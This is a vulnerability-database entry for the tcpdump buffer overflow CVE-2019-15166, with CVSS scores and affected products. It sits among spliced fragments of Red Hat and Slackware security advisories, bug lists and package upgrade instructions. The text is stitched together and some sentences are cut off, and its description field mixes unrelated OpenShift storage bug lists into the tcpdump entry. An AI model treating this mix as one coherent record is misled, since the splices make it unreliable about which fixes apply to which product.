crewjam/saml: authentication bypass in saml authentication (CVE-2020-27846)
golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference (CVE-2020-29652)
gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)
nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)
kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider (CVE-2020-8563)
containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters (CVE-2020-10749)
heketi: gluster-block volume password details available in logs (CVE-2020-10763)
golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)
jwt-go: access restriction bypass vulnerability (CVE-2020-26160)
golang-github-gorilla-websocket: integer overflow leads to denial of service (CVE-2020-27813)
golang: math/big: panic during recursive division of very large numbers (CVE-2020-28362)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html.

Bugs fixed (https://bugzilla.redhat.com/):

References:

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Bugs fixed (https://bugzilla.redhat.com/):

1732329 - Virtual Machine is missing documentation of its properties in yaml editor 1783192 - Guest kernel panic when start RHEL6.10 guest with q35 machine type and virtio disk in cnv 1791753 - [RFE] [SSP] Template validator should check validations in template's parent template 1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1848954 - KMP missing CA extensions in cabundle of mutatingwebhookconfiguration 1848956 - KMP requires downtime for CA stabilization during certificate rotation 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1853911 - VM with dot in network name fails to start with unclear message 1854098 - NodeNetworkState on workers doesn't have "status" key due to nmstate-handler pod failure to run "nmstatectl show" 1856347 - SR-IOV : Missing network name for sriov during vm setup 1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS 1859235 - Common Templates - after upgrade there are 2 common templates per each os-workload-flavor combination 1860714 - No API information from oc explain 1860992 - CNV upgrade - users are not removed from privileged SecurityContextConstraints 1864577 - [v2v][RHV to CNV non migratable source VM fails to import to Ceph-rbd / File system due to overhead required for Filesystem 1866593 - CDI is not handling vm disk clone 1867099 - CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs 1868817 - Container-native Virtualization 2.6.0 Images 1873771 - Improve the VMCreationFailed error message caused by VM low memory 1874812 - SR-IOV: Guest Agent expose link-local ipv6 address for sometime and then remove it 1878499 - DV import doesn't recover from scratch space PVC deletion 1879108 - Inconsistent naming of "oc virt" command in help text 1881874 - openshift-cnv namespace is getting stuck if the user tries to delete it while CNV is running 1883232 - Webscale: kubevirt/CNV datavolume importer pod inability to disable sidecar injection if namespace has sidecar injection enabled but VM Template does NOT 1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability 1885153 - [v2v][RHV to CNv VM import] Wrong Network mapping do not show a relevant error message 1885418 - [openshift-cnv] issues with memory overhead calculation when limits are used 1887398 - [openshift-cnv][CNV] nodes need to exist and be labeled first, before the NodeNetworkConfigurationPolicy is applied 1889295 - [v2v][VMware to CNV VM import API] diskMappings: volumeMode Block is not passed on to PVC request. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

Description:

The tcpdump packages contain the tcpdump utility for monitoring network traffic. The tcpdump utility can capture and display the packet headers on a particular network interface or on all interfaces.

The following packages have been upgraded to a later upstream version: tcpdump (4.9.3). (BZ#1804063)

Security Fix(es):

tcpdump: SMB data printing mishandled (CVE-2018-10103)
tcpdump: SMB data printing mishandled (CVE-2018-10105)
tcpdump: Out of bounds read/write in get_next_file() in tcpdump.c (CVE-2018-14879)
tcpdump: Buffer over-read in ldp_tlv_print() function in print-ldp.c (CVE-2018-14461)
tcpdump: Buffer over-read in icmp_print() function in print-icmp.c (CVE-2018-14462)
tcpdump: Buffer over-read in vrrp_print() function in print-vrrp.c (CVE-2018-14463)
tcpdump: Buffer over-read in lmp_print_data_link_subobjs() function in print-lmp.c (CVE-2018-14464)
tcpdump: Buffer over-read in rsvp_obj_print() function in print-rsvp.c (CVE-2018-14465)
tcpdump: Buffer over-read in print-icmp6.c (CVE-2018-14466)
tcpdump: Buffer over-read in bgp_capabilities_print() in print-bgp.c (CVE-2018-14467)
tcpdump: Buffer over-read in mfr_print() function in print-fr.c (CVE-2018-14468)
tcpdump: Buffer over-read in ikev1_n_print() function in print-isakmp.c (CVE-2018-14469)
tcpdump: Buffer over-read in babel_print_v2() in print-babel.c (CVE-2018-14470)
tcpdump: Buffer over-read in ospf6_print_lshdr() function in print-ospf6.c (CVE-2018-14880)
tcpdump: Buffer over-read in bgp_capabilities_print() function in print-bgp.c (CVE-2018-14881)
tcpdump: Buffer over-read in function rpl_dio_printopt in print-icmp6.c (CVE-2018-14882)
tcpdump: Buffer over-read in print-802_11.c (CVE-2018-16227)
tcpdump: Access to uninitialized buffer in print_prefix() function in print-hncp.c (CVE-2018-16228)
tcpdump: Buffer over-read in dccp_print_option() function in print-dccp.c (CVE-2018-16229)
tcpdump: Buffer over-read in bgp_attr_print() function in print-bgp.c (CVE-2018-16230)
tcpdump: Resource exhaustion in bgp_attr_print() function in print-bgp.c (CVE-2018-16300)
tcpdump: Buffer over-read in print_trans() function in print-smb.c (CVE-2018-16451)
tcpdump: Resource exhaustion in smb_fdata() funtion in smbutil.c (CVE-2018-16452)
tcpdump: Buffer overflow in lmp_print_data_link_subobjs() in print-lmp.c (CVE-2019-15166)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.3 Release Notes linked from the References section. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

1760430 - CVE-2018-14882 tcpdump: Buffer over-read in function rpl_dio_printopt in print-icmp6.c 1760445 - CVE-2018-16300 tcpdump: Resource exhaustion in bgp_attr_print() function in print-bgp.c 1760447 - CVE-2018-14469 tcpdump: Buffer over-read in ikev1_n_print() function in print-isakmp.c 1760449 - CVE-2018-14465 tcpdump: Buffer over-read in rsvp_obj_print() function in print-rsvp.c 1760453 - CVE-2018-14463 tcpdump: Buffer over-read in vrrp_print() function in print-vrrp.c 1760455 - CVE-2018-14462 tcpdump: Buffer over-read in icmp_print() function in print-icmp.c 1760457 - CVE-2018-14879 tcpdump: Out of bounds read/write in in get_next_file() in tcpdump.c 1760458 - CVE-2018-16229 tcpdump: Buffer over-read in dccp_print_option() function in print-dccp.c 1760461 - CVE-2018-16227 tcpdump: Buffer over-read in print-802_11.c 1760463 - CVE-2018-14881 tcpdump: Buffer over-read in bgp_capabilities_print() function in print-bgp.c 1760464 - CVE-2018-14468 tcpdump: Buffer over-read in mfr_print() function in print-fr.c 1760468 - CVE-2018-14880 tcpdump: Buffer over-read in ospf6_print_lshdr() function in print-ospf6.c 1760504 - CVE-2018-10103 tcpdump: SMB data printing mishandled 1760505 - CVE-2018-10105 tcpdump: SMB data printing mishandled 1760506 - CVE-2018-14461 tcpdump: Buffer over-read in ldp_tlv_print() function in print-ldp.c 1760507 - CVE-2018-14464 tcpdump: Buffer over-read in lmp_print_data_link_subobjs() function in print-lmp.c 1760509 - CVE-2018-14466 tcpdump: Buffer over-read in print-icmp6.c 1760512 - CVE-2018-14467 tcpdump: Buffer over-read in bgp_capabilities_print() in print-bgp.c 1760513 - CVE-2018-14470 tcpdump: Buffer over-read in babel_print_v2() in print-babel.c 1760514 - CVE-2018-16228 tcpdump: Access to uninitialized buffer in print_prefix() function in print-hncp.c 1760516 - CVE-2018-16230 tcpdump: Buffer over-read in bgp_attr_print() function in print-bgp.c 1760517 - CVE-2018-16451 tcpdump: Buffer over-read in print_trans() function in print-smb.c 1760518 - CVE-2018-16452 tcpdump: Resource exhaustion in smb_fdata() funtion in smbutil.c 1760520 - CVE-2019-15166 tcpdump: Buffer overflow in lmp_print_data_link_subobjs() in print-lmp.c 1804063 - Rebase tcpdump to 4.9.3 to fix multiple CVEs

Package List:

Red Hat Enterprise Linux AppStream (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201910-0929",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "30"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "29"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "31"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "mac os x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15.2"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "tcpdump",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "tcpdump",
        "version": "4.9.3"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "tcpdump",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "the tcpdump group",
        "version": "4.9.3"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15166"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:tcpdump:tcpdump",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat,Slackware Security Team",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-129"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-15166",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2019-15166",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.1,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2019-15166",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-147185",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-15166",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "HIGH",
            "attackVector": "PHYSICAL",
            "author": "cve@mitre.org",
            "availabilityImpact": "LOW",
            "baseScore": 1.6,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 0.2,
            "id": "CVE-2019-15166",
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:P/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-15166",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-15166",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "cve@mitre.org",
            "id": "CVE-2019-15166",
            "trust": 1.0,
            "value": "LOW"
          },
          {
            "author": "NVD",
            "id": "CVE-2019-15166",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201910-129",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-147185",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-15166",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147185"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15166"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-129"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15166"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15166"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lmp_print_data_link_subobjs() in print-lmp.c in tcpdump before 4.9.3 lacks certain bounds checks. tcpdump Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. In addition to persistent storage, Red Hat\nOpenShift Container Storage provisions a multicloud data management service\nwith an S3 compatible API. \n\nThese updated images include numerous security fixes, bug fixes, and\nenhancements. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1806266 - Require an extension to the cephfs subvolume commands, that can return metadata regarding a subvolume\n1813506 - Dockerfile not  compatible with docker and buildah\n1817438 - OSDs not distributed uniformly across OCS nodes on a 9-node AWS IPI setup\n1817850 - [BAREMETAL] rook-ceph-operator does not reconcile when osd deployment is deleted when performed node replacement\n1827157 - OSD hitting default CPU limit on AWS i3en.2xlarge instances limiting performance\n1829055 - [RFE] add insecureEdgeTerminationPolicy: Redirect to noobaa mgmt route (http to https)\n1833153 - add a variable for sleep time of rook operator between checks of downed OSD+Node. \n1836299 - NooBaa Operator deploys with HPA that fires maxreplicas alerts by default\n1842254 - [NooBaa] Compression stats do not add up when compression id disabled\n1845976 - OCS 4.5 Independent mode: must-gather commands fails to collect ceph command outputs from external cluster\n1849771 - [RFE] Account created by OBC should have same permissions as bucket owner\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n1854500 - [tracker-rhcs bug 1838931] mgr/volumes: add command to return metadata of a subvolume snapshot\n1854501 - [Tracker-rhcs bug 1848494 ]pybind/mgr/volumes: Add the ability to keep snapshots of subvolumes independent of the source subvolume\n1854503 - [tracker-rhcs-bug 1848503] cephfs: Provide alternatives to increase the total cephfs subvolume snapshot counts to greater than the current 400 across a Cephfs volume\n1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS\n1858195 - [GSS] registry pod stuck in ContainerCreating due to pvc from cephfs storage class fail to mount\n1859183 - PV expansion is failing in retry loop in pre-existing PV after upgrade to OCS 4.5 (i.e. if the PV spec does not contain expansion params)\n1859229 - Rook should delete extra MON PVCs in case first reconcile takes too long and rook skips \"b\" and \"c\" (spawned from Bug 1840084#c14)\n1859478 - OCS 4.6 : Upon deployment, CSI Pods in CLBO with error - flag provided but not defined: -metadatastorage\n1860022 - OCS 4.6 Deployment: LBP CSV and pod should not be deployed since ob/obc CRDs are owned from OCS 4.5 onwards\n1860034 - OCS 4.6 Deployment in ocs-ci : Toolbox pod in ContainerCreationError due to key admin-secret not found\n1860670 - OCS 4.5 Uninstall External: Openshift-storage namespace in Terminating state as CephObjectStoreUser had finalizers remaining\n1860848 - Add validation for rgw-pool-prefix in the ceph-external-cluster-details-exporter script\n1861780 - [Tracker BZ1866386][IBM s390x] Mount Failed for CEPH  while running couple of OCS test cases. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/libpcap-1.9.1-i586-1_slack14.2.txz:  Upgraded. \npatches/packages/tcpdump-4.9.3-i586-1_slack14.2.txz:  Upgraded. \n  Fix buffer overflow/overread vulnerabilities and command line\n  argument/local issues. \n  For more information, see:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16808\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14468\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14469\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14470\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14466\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14461\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14462\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14465\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14881\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14464\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14463\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14467\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10103\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10105\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14880\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16451\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14882\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16227\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16229\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16301\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16230\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16452\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16300\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16228\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15166\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15167\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14879\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libpcap-1.9.1-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/tcpdump-4.9.3-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libpcap-1.9.1-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/tcpdump-4.9.3-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libpcap-1.9.1-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/tcpdump-4.9.3-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libpcap-1.9.1-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/tcpdump-4.9.3-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libpcap-1.9.1-i586-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/tcpdump-4.9.3-i586-1_slack14.2.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libpcap-1.9.1-x86_64-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/tcpdump-4.9.3-x86_64-1_slack14.2.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpcap-1.9.0-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/tcpdump-4.9.2-i586-3.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpcap-1.9.1-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/tcpdump-4.9.3-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 packages:\n0855bcc24c0d39f6ec3c6fa7d956ebf4  libpcap-1.9.1-i486-1_slack14.0.txz\n1c53d8ea7923c5947dbbf0eb2dfca2aa  tcpdump-4.9.3-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n080435560c6498ba82e3131d9d7f36e4  libpcap-1.9.1-x86_64-1_slack14.0.txz\n3740823881e104943cb15be6870a0e7d  tcpdump-4.9.3-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n7f1dffd77993897a3729c1fb3ea5e395  libpcap-1.9.1-i486-1_slack14.1.txz\nb267563e154bbddab251e8e2c7a11f69  tcpdump-4.9.3-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n1177a6f007a4924c2116d15f8cb92900  libpcap-1.9.1-x86_64-1_slack14.1.txz\nde9844ab61993927903a91fc05450c8c  tcpdump-4.9.3-x86_64-1_slack14.1.txz\n\nSlackware 14.2 packages:\n2672c9a84590170ff8f7f2b233af9a38  libpcap-1.9.1-i586-1_slack14.2.txz\n578dbf94aa192915243e2d200c557cc5  tcpdump-4.9.3-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 packages:\n16f70962eebe606d3d9668202752bc51  libpcap-1.9.1-x86_64-1_slack14.2.txz\n0a4b8400d30a84bc1df774b3537cb4b5  tcpdump-4.9.3-x86_64-1_slack14.2.txz\n\nSlackware -current packages:\n8765839c82fc67a8075b9e1c5211776b  l/libpcap-1.9.0-i586-1.txz\n9de3c38d7c061534d28b5b599ab5d563  n/tcpdump-4.9.2-i586-3.txz\n\nSlackware x86_64 -current packages:\ncb278799afec0d6e99ce9a126b9e65f3  l/libpcap-1.9.1-x86_64-1.txz\n2d14083ccadb447e5af06e0f940fefa5  n/tcpdump-4.9.3-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg libpcap-1.9.1-i586-1_slack14.2.txz tcpdump-4.9.3-i586-1_slack14.2.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the 